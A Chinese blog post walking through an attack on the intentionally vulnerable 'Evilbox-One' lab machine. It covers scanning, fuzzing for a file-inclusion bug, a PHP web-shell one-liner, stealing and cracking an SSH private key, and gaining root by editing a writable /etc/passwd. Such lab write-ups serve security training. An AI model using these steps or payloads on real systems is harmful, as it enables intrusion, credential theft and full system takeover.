Evilbox-One靶机打靶过程与思路

zsszjybb

已于 2022-07-22 18:03:24 修改

阅读量2.5k

点赞数

文章标签：网络安全

于 2022-04-21 20:29:34 首次发布

本文链接：https://blog.csdn.net/qq_52610024/article/details/124330883

版权

1.首先进行fping内网侦探
fping -gaq 10.0.2.0/24

2.进行全端口扫描及服务扫描
sudo namp -p- 10.0.2.26
sudo namp -p22,80 -A 10.0.2.26 -A参数的作用是 -sV -sC -O参数的集合

3.ssh密码爆破失败，使用gobuster进行路径爆破
gobuster dir -u http://10.0.2.26 -w /usr/share/seclists/Discovery/
Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
发现secert路径下没有东西，再次对该路径进行爆破
gobuster dir -u http://10.0.2.26/secret/ -w /usr/share/seclists/Discovery/
Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
也没有在evil下发现，继续对evil进行扫描，还是没有发现的内容
gobuster dir -u http://10.0.2.26/secret/evil/ -w /usr/share/seclists/Discovery/
Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

4.对页面进行参数爆破，ffuf工具进行爆破,构造自己的参数字典
参数字典构造：vi val.txt
1
2
3
a
b
c
’
"
(
<
,
;
/
%

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt :PARAM
-w val.txt:VAL -u http://10.0.2.26/secret/evil.php?PARAM=VAL -fs 0 -fs是为了过滤掉无效的内容

5.改变思路，将可能存在的文件包含漏洞作为参数来执行

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
-u http://10.0.2.26/secret/evil.php?FUZZ=…/index.html -fs 0
发现参数名称为command
读取etc下的passwd目录…/…/…/…/etc/passswd

6.构建一句话木马，放置到/var/www/html下，本机开启apahe服务后，尝试用靶机的文件包含漏洞远程执行一句话木马
cd /var/www/html
vi a.php
</php $var=shell_exec($ _GET[‘cmd’]);echo $var ?>
sudo systemctl start apahe2
http://10.0.2.26/secret/evil.php?commond=http://10.0.2.15/a.php?cmd=ls
最后发现失败，思考是否可以使用php的封装器读取源码
php://filter/convert.base64-encode/resource=evil.php
对读取的内容进行base64解密得到程序源码

<?php $filename=$_GET['command']; include($filename); ?>

没有有效信息，思考是否可能有写入权限，php://filter/write=convert.base64-decode/resource=test.php&txt=MTIz
访后发现仍然失败

7.回过头来思考前面得到的passwd文件，注意到mowree账号有/bin/bash,尝试ssh登录mowree这个账号
发现该账号支持公钥和私钥登录，尝试访问公钥存放的默认位置，
http://10.0.2.26/secret/evil.php?commond=…/…/…/…/…/home/mowree/.ssh/authorized_keys
发现得到公钥，公钥的算法为rsa
默认私钥位置为http://10.0.2.26/secret/evil.php?commond=…/…/…/…/…/home/mowree/.ssh/id_rsa
访问得到私钥，将私钥拷贝下来
vi id_rsa
chmod 600 id_rsa
ssh mowree@10.0.2.26 -i id_rsa 发现需要输入密码文才能解开私钥

8.开始进行密码爆破
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz
hashcat john都可以进行离线密码爆破
cd /usr/share/john
ls ssh2john.py
./ssh2john.py ~/id_rsa > ~/hash 进行转化
john hash --wordlist=rockyou.txt 破解得到了密码文
再次尝试使用ssh登录最终发现成功得到mowree账号

9.开始进行提权操作
查看是否有定时任务crontab -l 没有发现
sudo -l 发现也没有权限设置不当
uname -a查看系统内核版本发现也失败
查找suid文件权限 find / -perm /4000 2>/dev/null 4000是suid权限位置,后面是将报错文件放置到空白目录中
查找sgid文件权限 find / -perm /2000 2>/dev/null 2000 也失败

10.思考是否有管理员留下来的root权限的脚本
find / -writable | grep -v proc 2>/dev/null proc目录是系统运行过程中自动生成的目录，所以可以过滤掉

挨个查看目录发现/etc/passwd/有可写的权限
openssl passwd -1 -1指的是一种加密算法，将加密后的密码写入passw中的root账号

11.登录最终发现提权成功，得到root权限打靶完成